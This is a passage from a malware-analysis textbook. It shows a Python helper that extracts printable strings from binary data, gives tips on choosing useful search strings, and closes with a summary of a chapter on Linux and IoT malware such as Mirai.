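    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [match.decode("ascii") for match in pattern.findall(data)]


# Hypothetical bytes standing in for a fragment of a binary.
SAMPLE_BYTES = b"\x00\x01/bin/busybox\x00ab\x00example.invalid\xff"

for text in extract_strings(SAMPLE_BYTES):
    print(text)
```

Longer and more unusual strings (custom paths, misspelled messages, protocol markers) tend to be the most useful search terms, while generic library strings rarely help. If the strings are encrypted, as in the XOR example figure shown earlier in this chapter, they need to be decoded first.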
In this chapter, we became familiar with malware targeting non-Windows systems such as Linux that commonly power IoT devices. Firstly, we went through the basics of the ELF structure and covered syscalls. We described the general malware behavior patterns shared across multiple platforms, went through some of the most prevalent examples, and covered the common tools and techniques used in static and dynamic analysis.
Then, we took a look at the Mirai malware and put our newly obtained knowledge into practice by using it as an example and coming to understand various aspects of its behavior. Finally, we summarized the techniques that are used in static and dynamic analysis for the malware targeting the most common RISC platforms and beyond. By this point, you should have enough fundamental knowledge to start analyzing malware related to virtually any common architecture.
In Chapter 12, Introduction to macOS and iOS Threats, we will cover the malware that targets Apple systems, as this has become increasingly common nowadays.